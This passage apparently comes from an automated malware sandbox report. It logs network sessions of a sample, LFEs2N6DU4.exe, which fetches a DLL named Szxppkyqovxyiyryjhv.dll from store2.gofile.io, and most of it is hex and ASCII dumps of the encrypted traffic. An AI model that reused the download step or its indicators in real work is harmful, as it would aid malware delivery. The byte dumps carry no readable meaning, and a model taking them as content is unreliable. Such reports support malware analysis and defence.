d1 c4 4f af 16 07 7c ac 3d d9 5e c3 0b 4d 9d a6 fa ac ee 98 02 51 bb Data Ascii: Tkc?MdyDMM13<G;yvK3ZFW%ZpyZmU 'oKI;RgAY-L526/ko\|4Imd%?{,uHgSodS"6.NZ#9{^?1[8+Hq_qrjd\I]XmggO\|=^MQ
2021-10-13 19:02:25 UTC	528	IN	Data Raw: 03 ee e0 f0 6a df 96 aa 67 dd 5b ec 5d ac ae cc 3c 1b 8d c3 7d 60 a0 50 c0 e4 ba d0 7f 67 b2 f2 e7 db cf 7b 23 2b 93 1d 9b 84 47 d7 d3 fb 0c ec 6c 83 80 db 2f f4 54 ea a1 0e 14 2c ef ba 93 e7 5f ba 8f a0 e7 09 3a 84 ae 3c 4a c1 87 53 9d b3 f5 f1 f1 bb 94 42 41 a0 7b 02 bd a8 6d 84 ba 13 64 77 b9 8b 59 e8 6d 5c 8b 5d df 78 e4 6b d3 59 a8 1d b6 a4 67 5d 51 40 1f 3b 1d eb 7a 00 fb e5 07 1a 9c fc 3d 64 38 79 2d e7 50 ed 47 68 d8 5d 9a e5 63 b8 31 0d ae 36 e0 f9 ef 35 cd 65 26 5a 5e 6a 5e 83 c2 4b 4e a8 ad c5 52 1e 20 b5 96 99 1c d9 2d 36 78 18 bd ed 73 5a 5a 82 f1 50 07 ff 42 4d 60 19 6e ca 46 72 a1 99 ed 9a 62 b7 23 99 15 7a 91 0b 10 31 72 16 5c 75 56 56 2d 71 c0 c0 fd df 6a 13 53 3e da a7 bc 75 4e b4 91 33 86 bb 86 b5 cd 8d 1a 92 d4 02 c2 32 74 93 90 ed 85 Data Ascii: jg[]<}`Pg{#+Gl/T,_:<JSBA{mdwYm\]xkYg]Q@;z=d8y-PGh]c165e&Z^j^KNR -6xsZZPBM`nFrb#z1r\uVV-qjS>uN32t

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49752	31.14.69.10	443	C:\Users\user\Desktop\LFEs2N6DU4.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 19:02:54 UTC	530	OUT	GET /download/37b08118-4d43-44c2-b112-31ce77d0b77d/Szxppkyqovxyiyryjhv.dll HTTP/1.1 Host: store2.gofile.io Connection: Keep-Alive
2021-10-13 19:02:54 UTC	530	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Disposition: attachment; filename="Szxppkyqovxyiyryjhv.dll" Content-Length: 542208 Content-Type: application/octet-stream Date: Wed, 13 Oct 2021 19:02:54 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Powered-By: Express X-Xss-Protection: 1; mode=block Connection: close
2021-10-13 19:02:54 UTC	530	IN	Data Raw: 58 44 63 a5 cd 21 cb 11 d6 48 51 27 17 c0 81 52 72 f1 0b a7 eb c9 9b e7 53 a0 0b bd 34 e7 95 e6 86 8c d0 bb 93 4e c6 e8 30 7f f4 db 1e 3e a8 00 52 08 2e 6f 25 a8 e2 27 e5 e3 09 c7 2f 2e 96 77 c6 83 e7 90 50 bf bd 15 99 68 af b5 d9 a5 f8 0a 44 5b 1f 35 36 4d 01 ef eb 11 d9 59 7f ef 20 54 47 c0 27 b9 f8 a0 f0 95 e7 3d cf d0 88 14 40 c6 7b d5 46 fa 4d 76 99 30 2d 0f 80 ab b6 a8 a9 e5 2b 44 d8 67 2e d8 0b 53 4e 2c c9 30 61 2b e3 04 53 5f b4 e8 61 c0 03 43 01 b3 a3 2a 0f a3 a8 48 05 7a 30 27 82 a2 92 eb 3f d8 75 d7 89 99 32 53 75 c9 dd 20 d5 9b f8 ba b3 98 38 e1 0d 2e f7 20 35 54 2e d8 df 9d 29 73 51 77 9f f0 c0 db ef 5f b2 aa ff 47 7f 57 d5 76 be 72 f4 3e c5 c7 dd 3e 49 fb 1e 93 13 c7 c6 f2 74 60 10 38 8a a3 cf 5f e0 a5 42 db a9 b5 69 11 01 92 d7 c9 5a 1a 93 Data Ascii: XDc!HQ'RrS4N0>R.o%'/.wPhD[56MY TG'=@{FMv0-+Dg.SN,0a+S_aC*Hz0'?u2Su 8. 5T.)sQw_GWvr>>It`8_BiZ
2021-10-13 19:02:54 UTC	531	IN	Data Raw: 9e 35 66 8e b8 66 4f 06 ce c2 8c dc 67 8f a1 74 15 4d fb db 0e 86 9c 5e 02 5a 59 6a 49 9e 03 84 f6 20 a9 72 53 b1 c7 53 b2 d2 1d e2 12 46 3d df c3 f1 4c 55 bc 92 8b 77 3c f7 70 e0 ac 81 09 2a eb e8 e1 d3 8e f7 6c d7 3f 70 e4 1f 46 a8 e1 08 fd 40 f5 be 27 8a b4 76 9b 0c 05 d2 51 a4 12 4b d0 ce 9a 29 ad 8b f5 30 68 13 4a 07 ad c0 df 20 da 7c 4a c1 37 1d bc 65 35 ac f6 cf 31 99 e1 17 89 53 9e 7e b1 f0 f7 58 6a 2a 26 da 87 8e 25 17 8c 56 60 85 da 81 35 a9 9d 5a 23 a2 43 c0 24 85 45 ec ed 51 60 a5 f7 da 4d c2 7c 7a 60 04 f2 8a b1 07 cf 49 39 a6 fb 16 7a 09 78 93 fe 45 a9 f0 f4 39 dd 13 0e d8 3b 06 23 37 de d0 29 21 34 c5 2d 72 0b 3a 62 b2 a2 64 bd a1 b7 8d c0 64 8d 08 3d 16 63 44 f4 a0 c6 11 7a ae 27 b1 b8 0d 8d c8 71 14 0a 18 6e 01 95 11 d3 2e eb e0 27 dd cb Data Ascii: 5ffOgtM^ZYjI rSSF=LUw<pl?pF@'vQK)0hJ \|J7e51S~Xj&%V`5Z#C$EQ`M\|z`I9zxE9;#7)!4-r:bdd=cDz'qn.'
2021-10-13 19:02:54 UTC	533	IN	Data Raw: 11 af ce 49 0b c8 45 ac f1 08 d7 8e 32 54 e4 19 9a ad 74 14 e1 fa fc 4e 37 f9 3a 67 53 17 1e 4b 3b 7a b9 49 55 b4 15 6b 7a c1 24 55 d0 4f 62 a5 f3 d6 1b de 2a a7 0d 6d ff 2a f4 ba 69 f2 84 f5 de bd d8 42 e5 70 0e 88 78 d9 c7 3f 23 bd 5f 77 bc e7 98 3a 85 4a fe 87 97 16 79 4c a8 44 07 fb 6b 9d e5 36 5d 82 9b e6 4f 4c 25 cb 04 8c a9 5e aa 49 0e a3 13 ac 9e d5 d4 18 a9 0f 78 27 1a 91 82 0d 33 4c 52 ba b5 9a 1b 44 73 0a 3b e4 c2 14 81 83 dd 88 82 28 82 d7 2d 7b f1 e5 79 59 e9 ca 61 22 ea 35 ca e3 89 c5 16 7f 08 c3 8e 68 7c 98 ad a9 32 67 55 46 7f 82 9a de 0a 93 1e 0f 8f 34 5b bb 6b 61 ff 57 d9 63 1d 00 54 a2 b7 ed 1a 7d 27 28 5a f1 bb 9a 45 14 51 e4 8e 1e b9 62 8b 15 b2 8b 34 bb fe 90 10 77 32 6a f9 e1 dd ac f5 65 3b 3a 31 90 8a 11 2a 7c c9 41 09 c5 ef 24 04 Data Ascii: IE2TtN7:gSK;zIUkz$UObmiBpx?#_w:JyLDk6]OL%^Ix'3LRDs;(-{yYa"5h\|2gUF4[kaWcT}'(ZEQb4w2je;:1*\|A$
2021-10-13 19:02:54 UTC	534	IN	Data Raw: 9b 63 97 d4 24 89 70 a2 d2 1d d4 95 c5 74 2b 8c b6 7a f9 bc 27 b0 ba 8b e6 92 ef 77 c5 b8 72 de d9 5f 40 db 7a 86 af 57 46 3e d1 5c 1d bd 4e ba 81 46 b9 14 3e 25 ea 7c 7e 00 91 14 23 96 a0 ad 10 fd 3e 31 3b 4f ec a7 f3 1f 04 c8 86 dd ba b7 79 9b 35 8d d8 84 f0 0a ee 5b b6 42 16 52 53 3f 95 69 b6 55 f5 58 ef f1 e1 a0 d3 ba 2f a7 6d e6 6c 57 38 c7 69 67 32 79 b5 3b d2 04 17 db 4d a2 89 53 b6 08 54 b3 90 32 7c 5e b0 d2 b7 c3 5a a5 a4 dc 1d a8 d3 22 19 4a 74 61 18 08 e9 4a 86 fe d9 fc 60 60 15 27 95 61 41 e5 71 63 6f cd ac 0a ce fc 8c 26 6c 10 43 1e ad f7 85 ed d6 99 a2 6d 97 31 f4 95 ac 04 d7 33 fa 34 e0 5e f1 f9 e1 ca db 02 e9 ce 1c 9f 98 62 1e c4 c4 8f 46 26 4e 8c 0f 32 b9 8b 65 15 47 70 69 61 88 1d 39 39 48 95 c0 51 e9 b5 f1 03 b8 44 7b d2 e7 6a 88 3e 3f Data Ascii: c$pt+z'wr_@zWF>\NF>%\|~#>1;Oy5[BRS?iUX/mlW8ig2y;MST2\|^Z"JtaJ``'aAqco&lCm134^bF&N2eGpia99HQD{j>?
2021-10-13 19:02:54 UTC	538	IN	Data Raw: bb 00 63 0e 8f 53 da bb f1 5b 92 1d 95 24 2e 15 d9 d5 c8 e5 d1 91 fd 84 13 31 24 6d 33 df c9 11 0a e5 e2 9f 9b ac a8 43 c7 c9 be 98 7d 4d fb 8a 95 6b f9 5b df 53 d5 08 23 d0 87 e6 5e 59 34 fc 61 23 17 00 9d cb f1 62 73 2e e6 0c 49 f0 b4 37 6c aa 7f 49 ce 1a 4d 42 a8 18 f6 8e 3e 55 f5 31 b1 bb a7 64 9b c3 f7 43 8f 9d 1f 69 46 12 f7 84 f8 4e fd ac c9 2d 71 18 3e 3d 07 7e b6 0b 19 b9 0b 79 26 51 ad 73 2f ff a6 c6 47 03 72 0d ed f5 22 70 39 f0 38 bb f3 6c 0b ab 39 7c 54 cd ff bc 39 eb 47 2b 68 6b ae c1 b6 4a 42 f1 29 d0 26 48 b2 46 2f 2e f8 34 77 1b 3d 22 c8 cd a9 26 2c 41 f0 da 19 8f 17 f1 6f 37 23 a0 7e 5e 34 5a 55 6e 0f a6 2d 14 61 2f 78 a5 26 84 8a ab 21 89 fb 6a d2 0b 62 8e a4 ec 4b a4 65 45 ac b0 a3 81 54 c9 35 d2 f7 d7 00 69 ce f5 b1 21 95 81 fa 66 ad Data Ascii: cS[$.1$m3C}Mk[S#^Y4a#bs.I7lIMB>U1dCiFN-q>=~y&Qs/Gr"p98l9\|T9G+hkJB)&HF/.4w="&,Ao7#~^4ZUn-a/x&!jbKeET5i!f
2021-10-13 19:02:54 UTC	543	IN	Data Raw: 0b 0f 49 72 77 6e 26 29 ab ed a0 44 16 f9 73 d0 2c 48 5e 14 74 8e 3f d6 84 c6 5e d3 9b 8b 3a 94 b2 e1 da ba 8a 9f 77 6d 1e 07 a1 40 ab f9 42 cb fe ee 49 cf a4 4b ad 9e 3a 10 90 87 63 46 8b 99 67 39 e7 ee 22 55 a4 44 c3 91 71 d5 b3 85 01 7a 78 f6 93 2c f8 6f b6 55 70 d3 d8 85 ac 07 9d c8 6c e8 2b 02 4c 5d d3 0a 18 5b 30 8a e7 60 ad a8 fa 9e f7 16 6d 14 86 af 3c c8 fb fa f9 1f 16 7c 28 e8 b3 42 76 52 b5 ea d4 5a 37 c1 c9 58 df d7 b7 6c 4a af 29 e0 fc ea 7d 2d 94 e5 00 54 6d 19 01 1c 1a 97 ae b8 82 e3 f8 d5 4f ca 77 43 90 ea e1 0c 65 9c d6 4f 3b f7 06 1a f8 e4 c0 e8 eb 70 fb 6d 27 79 81 1a 66 c5 e7 a7 df c7 a2 37 ad c9 51 cd 8c 0f b0 57 1a 8c 4b 68 11 3b 08 97 f2 5b d8 92 64 d2 ae 9d 28 17 b1 f6 1a cd 5d ac 48 cb f5 1a 40 1c 0f fd e8 b2 29 ea 19 1c b4 6a e7 Data Ascii: Irwn&)Ds,H^t?^:wm@BIK:cFg9"UDqzx,oUpl+L][0`m<\|(BvRZ7XlJ)}-TmOwCeO;pm'yf7QWKh;[d(]H@)j
2021-10-13 19:02:54 UTC	550	IN	Data Raw: 46 8b 85 25 80 bd 4b 18 0d 6c ef 3f 1a 3a 12 73 09 1e 8d 00 df b5 83 1c c1 0a 06 49 65 1c ba 95 bd 88 45 b0 4b 99 5b 29 61 bd ef 96 83 3e 27 90 56 18 9c c3 b6 52 f9 2b 8d 5c d5 d6 c7 be 58 91 42 13 a5 7e 76 ee 8f 4b 07 b5 91 d7 55 72 c7 5b f6 51 7d ac f8 af 33 9d 14 bb 02 f8 6e 08 af 06 ac a6 62 bd d8 25 ad 1b 9b 4f 3a 56 a2 c1 55 b4 ce db 4c b9 1e 2a 41 9f bd fb d3 1f f1 47 94 2b 92 7a bd 90 c0 e4 59 98 ea 34 de fc da 75 32 45 3a 8d 30 6a 7b 0e 9a 44 0b 75 e7 60 a9 6d 4e 5a 7e 41 95 63 85 a8 60 9a 8e 1a 82 45 bd 8c ec 79 53 b9 cc 66 b3 35 62 f2 3d fb 6c 19 f4 c3 66 d9 ca 5b 61 46 43 ec 5c dd 93 cb 65 15 62 1c 30 d8 a2 48 31 ac db 03 e3 24 c7 3a 8a 71 d3 4e 5d b5 97 b8 34 b3 07 72 c6 50 0c 79 32 30 e0 be 74 e7 6a 9a 45 29 88 39 8a 8c b0 17 29 00 c6 7b 96 Data Ascii: F%Kl?:sIeEK[)a>'VR+\XB~vKUr[Q}3nb%O:VUL*AG+zY4u2E:0j{Du`mNZ~Ac`EySf5b=lf[aFC\eb0H1$:qN]4rPy20tjE)9){
2021-10-13 19:02:54 UTC	559	IN	Data Raw: c9 73 4d dc 0c 4e 2f 16 d4 9a 83 65 18 a9 62 31 94 2f 72 bb 3d 22 33 8d 97 43 6c 03 dd 00 28 22 80 23 34 0a c8 4d f3 d7 f9 8a 07 0c d0 90 ed 81 53 9f ce 4d 72 71 ec 67 35 1c 44 0d 68 78 ce 74 b1 a7 bc 3d a9 69 49 58 6d 06 c5 db cf 67 b4 77 8b c1 ea 1d dc 53 25 93 33 5f 71 05 e7 ec d5 90 6b 3a 51 bd c7 56 a2 eb a3 73 f1 de d9 a4 5f 2e a1 4c f4 17 a2 fd 8f 70 93 6b 58 8e 77 e2 c0 cc f5 50 91 82 e7 60 f1 fd 12 b2 18 27 62 3f ce 2e df 08 fc 74 06 5d 66 d3 41 15 8d df df 47 be d3 41 c4 4f 02 6e b6 7d c7 d8 ec 6a 16 10 97 03 83 da ad c9 12 28 70 3a e0 0e 93 df ac 77 23 8a 7e b9 fe 83 4b 92 02 4d 64 01 4c 39 5a 7f 5d 81 a8 18 3f 1f 4f ee f1 f9 ab 06 7b 62 e2 a1 bd 3f e6 f9 5e 3e a8 1c 0b ed 20 bb 7e dc c4 f1 b7 a1 20 7e 90 14 45 f5 10 9a 7b bb 4b f1 bf e8 a1 2c Data Ascii: sMN/eb1/r="3Cl("#4MSMrqg5Dhxt=iIXmgwS%3_qk:QVs_.LpkXwP`'b?.t]fAGAOn}j(p:w#~KMdL9Z]?O{b?^> ~ ~E{K,
2021-10-13 19:02:54 UTC	566	IN	Data Raw: 7d b3 46 fb a6 dd f6 d3 fa 30 71 7e 8a fd c9 9c a0 de 64 80 3f 4a 23 fd c1 09 d3 f9 5e 62 d1 89 52 b8 27 77 33 31 57 d4 00 be ca dd d3 5d 79 a3 bf cd 94 f2 07 e5 67 a0 42 5b df 76 4f 88 43 1e de 74 bf aa b1 94 ce 90 21 e2 5f bf b6 64 3a 30 b1 92 e6 07 d1 70 a9 91 32 15 e4 97 af 52 36 a0 a7 5d de 43 3c ba 0a fa 3a 9f e9 89 23 0b c3 8d 28 fa db 68 67 74 79 8e 84 79 b6 ae 87 19 f3 5c dc cb 8f 65 6b f2 6b 2b 79 f9 f2 a4 69 0d 4e 57 88 29 4f 44 01 b3 61 b0 f6 1d 4e aa 2d 08 16 74 a7 78 8a 2c d1 79 f9 2a d1 98 d9 a3 c4 87 39 ba 80 f8 13 c2 9d 1d f9 44 68 ab 1b 0d 9c 7f 45 14 ad 5f af 9f 52 fa 2d af bc 71 4e 26 0c b6 e2 53 ce 94 a1 7d bb 87 74 b6 69 5c 2d 1f d4 ee 40 e1 ab 05 83 43 87 3e ec 80 60 c9 87 79 dc 33 92 b3 dd 12 86 54 e2 eb 17 35 7f cd 2c af 60 f0 02 Data Ascii: }F0q~d?J#^bR'w31W]ygB[vOCt!_d:0p2R6]C<:#(hgtyy\ekk+yiNW)ODaN-tx,y*9DhE_R-qN&S}ti\-@C>`y3T5,`
2021-10-13 19:02:54 UTC	577	IN	Data Raw: 07 61 03 c2 5e 0c dd 12 47 57 2c bc 0e ca e2 66 d1 9c 58 c5 b2 d5 2e 86 28 fb 52 bc aa af 1a e4 7e 78 e7 c8 43 e6 f9 69 93 6f 29 7e 9e cf 46 61 cd e3 82 c0 4f 48 1c 48 f2 67 63 21 28 3b 74 d7 aa 30 0c 71 52 a4 07 c6 2f ff fe 1a 88 1f 7b 9f d6 d7 64 0f 2d b9 84 aa 50 ce ae 61 a9 41 05 5c bf 94 49 4d 74 df b0 ad 07 78 9a 06 87 78 aa ae d4 a3 9c 97 c1 d1 17 8a 23 81 dc 20 6f ff 1d bb 4c 16 35 5d fb 25 25 c4 ef b5 dd 5a 43 4d f5 28 3c c1 6c ec 24 ab 37 88 7d 85 dc 61 23 9c dc 61 8c 77 8f e6 74 75 4d 8a 8a 25 44 3f b6 a7 df 4f c4 9b e6 26 34 99 77 50 09 17 ce 84 95 4c 97 9e ae 12 a6 de 0a ae ed ac ed 47 76 24 c4 9a ad f6 24 02 67 b8 7c b6 d2 30 28 ed 26 c9 02 98 85 b3 27 c2 93 50 62 54 08 5c 84 5a 1a 65 0c 74 ff 03 ec d4 8e 91 a1 95 1d d0 10 2f 10 5a b7 bb e5 Data Ascii: a^GW,fX.(R~xCio)~FaOHHgc!(;t0qR/{d-PaA\IMtxx# oL5]%%ZCM(<l$7}a#awtuM%D?O&4wPLGv$$g\|0(&'PbT\Zet/Z
2021-10-13 19:02:54 UTC	588	IN	Data Raw: 81 b5 57 a0 08 62 8a e0 4d 61 8f d0 e2 4c 9b 2c ff cf 39 a0 31 79 31 55 b9 98 06 7f 33 6e 98 f8 d1 5a aa ae 6e 1a b8 02 08 da cb 25 9c 5b 4c a6 d5 37 69 9f e3 27 f8 85 43 47 ea e0 4b cc 44 ee f7 85 b1 3b 25 69 b1 52 08 56 21 e2 a6 80 84 31 5d e4 4c 4e 8e f3 98 94 c4 dd 58 12 df 67 e8 d1 73 dc c4 81 38 8f f0 19 89 4e f9 42 76 50 c9 d4 bc c1 e2 f1 5f a2 f1 a6 95 4e 74 80 34 8d a3 2c 80 fd 8e d5 8d 77 00 56 50 73 ca 9c aa 2f a6 bd 7a 96 7a 1b 36 91 57 1d c0 14 ad c3 72 89 b6 15 79 7b 7a 37 8d 7d 4e 1a 4a cd 08 2a 7e 0b 34 02 e8 41 82 51 b4 54 e9 3b cb c1 1f 0f 91 30 5f 44 9c 85 43 f4 65 f4 35 69 6b 4a 0d 7b f3 5b fc 03 aa 6b a5 34 4b 19 e7 f8 80 e2 5f 3c 7a 14 f4 8c d5 5d f2 f9 13 2f 6e aa ed 03 9e f5 bc e5 bb 60 12 5d d3 08 6b 3b 7c ef 4b 04 14 d9 e6 ba 97 Data Ascii: WbMaL,91y1U3nZn%[L7i'CGKD;%iRV!1]LNXgs8NBvP_Nt4,wVPs/zz6Wry{z7}NJ*~4AQT;0_DCe5ikJ{[k4K_<z]/n`]k;\|K
2021-10-13 19:02:54 UTC	594	IN	Data Raw: 19 df 7e 68 1a 83 f8 a8 a9 ab 3e d4 66 60 05 3f ae 65 79 8f 16 0e de 92 23 68 f0 e9 a2 27 c5 ee 3d 12 a8 be 32 ac a3 fb 98 a0 09 8b 27 46 15 d1 3f 6b a3 5e f7 7e a6 85 ac 40 e8 07 16 85 24 d5 1d 8d b4 98 62 03 5f 32 c2 6e 80 16 87 b1 2b cb a9 a7 4e 1f b4 64 e2 aa 95 4f 0c 59 5c 6d b0 a2 7a 7f d7 bb ce 12 a4 0a fb 83 3d 0e ca 37 bb 83 4c c5 2a 92 26 fd 2c 18 66 da ac 0e 61 03 46 90 59 60 51 06 2d 28 d0 93 e0 51 1d 60 cd 1d 8e 67 09 37 4d 12 17 82 5b c6 f2 31 20 9e 5d b8 13 31 c6 8f 5d fe 1f 5c 15 69 08 d7 8e 3f 5c e6 4d 01 b6 6e 8c 53 83 ab cb 8f 8b 6f 40 cb 53 2a 85 f5 2a b7 2d 0d 46 26 a5 3f 87 b4 a1 fc 50 69 a3 8a b2 ed 11 b1 f5 ca 91 e8 7e 0d 76 5e d9 59 91 32 f0 b0 ef 57 88 39 5b 29 c8 1f 7b a9 09 14 63 c4 cf 0f 24 5a b0 dc d4 81 e0 61 9b c5 82 b5 e3 Data Ascii: ~h>f`?ey#h'=2'F?k^~@$b_2n+NdOY\mz=7L&,faFY`Q-(Q`g7M[1 ]1]\i?\MnSo@S*-F&?Pi~v^Y2W9[){c$Za
2021-10-13 19:02:54 UTC	608	IN	Data Raw: 77 77 9c 04 89 5e df ce fa b3 ba 5c 1d fb c6 a3 fa 44 26 89 fd 14 e8 7c 14 6b 13 f0 81 9f a3 ef d9 07 df 9c e8 8b 47 ab 3f 7e cf d6 58 b0 ff c2 2b 27 45 ce 03 42 b2 d6 84 c4 90 3a 6d 3e ef 72 32 af 0c 5c c6 86 b9 a9 21 9f 91 f7 57 09 58 b2 c1 2d 35 12 3c 9f 64 36 b4 00 50 13 35 64 56 1e e2 9e 22 83 9e 70 f8 ed 0e 47 40 6b e6 51 76 26 4f 1e 49 15 c2 dc f9 eb 38 57 81 d4 10 f1 bb e2 b1 07 c3 d8 2d cf 0c 39 69 d3 bc 07 64 63 e0 59 6b f4 08 53 dc d0 22 65 6d 4f fd 15 48 fd f5 f1 bd 3b 10 fa a2 34 3d 19 a8 fe f5 67 1e ed 92 51 19 cb ae 60 f0 8b 10 c3 e5 3f b2 68 e9 33 59 e9 e9 98 8c bf 8a 7a 8b 40 c1 63 39 58 4f 64 e3 a2 7d 73 0c 0b 1e 7e 69 16 96 3c 3a c4 ae e4 e4 92 ca 0a f1 09 ba 7b f3 f9 af 8c c3 7b 6a d4 83 c2 2c 88 6f c7 ee 5a ff 45 a6 c3 cd 2f 33 4e 82 Data Ascii: ww^\D&\|kG?~X+'EB:m>r2\!WX-5<d6P5dV"pG@kQv&OI8W-9idcYkS"emOH;4=gQ`?h3Yz@c9XOd}s~i<:{{j,oZE/3N
2021-10-13 19:02:54 UTC	623	IN	Data Raw: 80 dd 9b 30 bb d1 2a dc 73 64 c5 87 9b ec 65 df 8e 04 2f 2f c6 b5 9b 24 d7 2f d8 28 f7 41 07 4e a7 30 a5 62 9f 2a 8a 59 69 6c 69 38 ee 1a a7 e0 48 7d 74 e7 85 21 ed a3 8a f7 fc b5 9d ac 47 21 bf 89 46 6b 34 6f f3 30 3c 0b 4d bd 6b 12 21 38 cc 88 7f 86 15 72 29 78 22 5b 33 32 ad 4d 40 da e9 c8 e5 e2 56 13 72 1a e0 b1 f2 53 33 f0 bc 25 05 e9 b1 e0 6b 3e 9d 3e 0a b9 56 fe 0e ec f9 2c ad cf 6b 6a ae 92 53 93 cc 57 02 ca 5f e2 32 4f 05 82 94 47 d8 92 7a c0 c0 03 9f cb 22 dd d9 bb b8 13 f9 f4 47 dd 5e 77 fb fe e0 06 ff 36 27 e6 18 44 e9 6f 27 16 ea a3 69 09 74 c6 91 29 d0 04 86 48 ac ba 45 64 50 83 1b 72 94 36 1c 5b 7a 5b 9d 8b 34 1f 0f d8 a0 2f 16 04 62 f4 59 f2 99 69 84 07 80 d9 41 ec d8 94 ff f6 11 8f 7e b8 15 ff 3a 1e 0c 88 03 93 58 3f 33 45 cb 6b d4 e4 40 Data Ascii: 0sde//$/(AN0bYili8H}t!G!Fk4o0<Mk!8r)x"[32M@VrS3%k>>V,kjSW_2OGz"G^w6'Do'it)HEdPr6[z[4/bYiA~:X?3Ek@
2021-10-13 19:02:54 UTC	626	IN	Data Raw: 80 7a 87 3d 05 3e 1d 89 4a 83 6a 8f ca 07 6e ba 48 77 90 e5 d3 44 88 c2 70 31 d1 f0 26 b7 cb ee e4 24 2c f1 60 77 78 35 05 e4 4e 65 37 cc c6 28 23 45 fc 94 26 b7 0b 75 79 0e cf f6 0f d7 cf 33 6d 51 6d 55 61 00 2f b4 95 5a 93 7d f4 86 d8 9e cd be b2 4c ec a2 b4 b8 eb 35 d1 dc 22 36 3b 35 0f 4a 0a 3e bf bd d2 37 a8 c4 eb bf ce 01 d0 9e 2b f4 4d c7 b9 f3 53 fd 4b 83 04 66 16 90 9f 5f 5f 45 b3 8e 56 31 b1 88 da ff 2a 56 c7 e7 ab 20 c2 0c 37 47 8b 39 f0 96 e6 e6 8c d9 ad 6b 81 1b 24 31 4a 81 2a 97 63 0c e9 b9 5d 69 6e d2 dd 79 98 da 73 1d c5 28 f6 60 ec 03 80 57 7e a1 30 a8 94 33 0b 48 07 3e 52 10 ca 20 8c 7e eb e8 42 5d 2c 04 d6 d1 f4 72 bf 0a 83 79 4e f9 c8 8e 14 eb 57 56 46 d6 22 0c 9e 25 72 8c f8 f7 13 f5 20 d3 ad 55 91 36 8a 89 9a 97 0c cb a6 dd ff ef 2c Data Ascii: z=>JjnHwDp1&$,`wx5Ne7(#E&uy3mQmUa/Z}L5"6;5J>7+MSKf__EV1V 7G9k$1Jc]inys(`W~03H>R ~B],ryNWVF"%r U6,
2021-10-13 19:02:54 UTC	642	IN	Data Raw: 0b 9f 0f d7 d2 bd 1d 59 12 58 75 95 09 04 7a 63 6f 7a b1 1a 7b a4 a4 62 4a 36 37 23 ab c6 cf 8c 5d 6f a9 7f 67 03 a9 a1 a2 42 54 60 00 c6 55 72 03 3b 81 e8 82 25 19 2b 52 74 61 55 09 4b 00 20 00 3c 9a d0 91 df 47 0c ee 68 a3 00 06 8d 9d d8 23 66 be 4e 75 6f 2b 5a 98 5d 85 3f 5f 73 52 e4 b3 91 b1 27 8b 65 73 dd 74 8a e7 c1 f2 89 85 f1 71 89 ef d1 d8 dc ca 18 64 89 60 0d 24 ea 6d db 31 26 3d 91 0f e6 0e a7 8d b9 46 69 fc f6 8a b3 9d 82 73 a3 c5 d3 49 97 ba 1f 3d 09 f5 5e c7 69 70 40 82 da 33 2c ca 0b 7a 21 73 91 1e 42 72 b8 39 09 9a 49 d4 0c 4f ec 72 70 c0 92 c0 33 6a 29 02 1e 85 4b 7d 20 4e ea 39 2e ee dc 81 27 0e 75 f8 80 97 cd dc 08 05 a7 07 88 ad f5 de b0 86 59 06 07 44 e5 10 18 97 0e 84 75 fc 7b 19 65 b2 a3 0f d6 0b 3d b9 4d 00 07 40 40 74 b9 bb ea 68 Data Ascii: YXuzcoz{bJ67#]ogBT`Ur;%+RtaUK <Gh#fNuo+Z]?_sR'estqd`$m1&=FisI=^ip@3,z!sBr9IOrp3j)K} N9.'uYDu{e=M@@th
2021-10-13 19:02:54 UTC	658	IN	Data Raw: 42 12 88 8e e5 84 bb 35 b4 d5 93 81 20 a1 11 17 6d d1 e5 1e 59 6b 08 69 9b e3 9b 38 cd c8 fd ef 47 1b 4b a1 35 2e 22 75 cf b3 35 06 ba e1 df 67 2e de 28 50 16 13 93 41 43 31 62 1d 54 05 75 c3 be c3 50 1f b7 8e a7 fe 25 81 ab 0e 7b 71 99 3e cc f0 07 a2 1d 85 81 4e 50 46 41 cf ce 39 fd ed 99 55 fd 95 d4 a4 72 ba 23 33 88 d0 22 df c2 e7 c5 ef da 67 16 4a 09 80 e1 61 38 cf 8e cc 53 4d 79 50 9c d5 99 72 81 5a 38 98 0e 63 2d d4 56 40 ba 58 f2 cf d1 d2 c8 ac cf de 5f de 17 ef ed 91 1f 82 ce bf cb c3 55 49 c9 fe be 4a 57 6c b2 b0 90 88 4f 42 3c c1 36 6d 8e d5 dd c0 8c f4 13 ea 8a a9 aa 0b 73 53 ee 69 c9 68 2c 55 46 ae c4 f5 d1 3d 71 10 79 8b f0 d3 e0 b7 ae e9 cf e7 50 4d 2d de 44 30 0d d1 fa f0 52 83 de 22 01 d0 b8 dd 6e 49 5f 3b 83 80 3c c1 17 57 ad c8 b5 9f fd Data Ascii: B5 mYki8GK5."u5g.(PAC1bTuP%{q>NPFA9Ur#3"gJa8SMyPrZ8c-V@X_UIJWlOB<6msSih,UF=qyPM-D0R"nI_;<W
2021-10-13 19:02:54 UTC	674	IN	Data Raw: e3 6e cc f6 b0 75 89 11 73 24 09 b7 c4 c1 6f 2a 67 47 ed c1 16 ea ee ab 36 34 f8 80 1a f3 6e 3a ac 8d 7f 78 dc c5 21 a2 34 20 d3 0d 34 93 de 19 71 af 07 83 e7 33 a5 3a 1d 08 71 2a a3 58 3b 83 99 b0 e8 5e 07 c4 77 19 50 7e b5 06 aa 0e bb 21 bb e6 47 24 2a 46 0d b7 53 37 8c ad f2 c3 86 70 b4 b6 ce 08 56 5c ad ff 0c 2e 70 d1 1f 78 ca ce 16 f1 2b 5d b3 33 8d 5e 09 fa b4 db 84 8a fe d1 c5 c8 d6 23 ec b1 ba dd 19 79 74 5c 33 ed 75 fb 81 d0 79 85 05 b2 55 2e 77 7a b3 2c a5 76 b2 aa 5d 3f 5f 2e 9c 76 eb 0c 6d a4 e2 e4 18 e1 56 33 a3 0b 16 cf 34 a9 28 9a 78 e9 e7 a4 c0 6c 19 5a 96 fe fb 37 a3 97 29 59 aa 5b 5b a9 83 de 88 c3 74 e7 d3 55 64 65 d4 63 12 dd 8b 2a 68 30 7f a2 f5 05 e1 94 e9 2e ef 30 92 e9 2e 6d 28 6c 25 9a 66 35 14 2b 97 cf d0 f8 b2 aa 82 b5 62 75 68 Data Ascii: nus$ogG64n:x!4 4q3:qX;^wP~!G$FS7pV\.px+]3^#yt\3uyU.wz,v]?_.vmV34(xlZ7)Y[[tUdech0.0.m(l%f5+buh
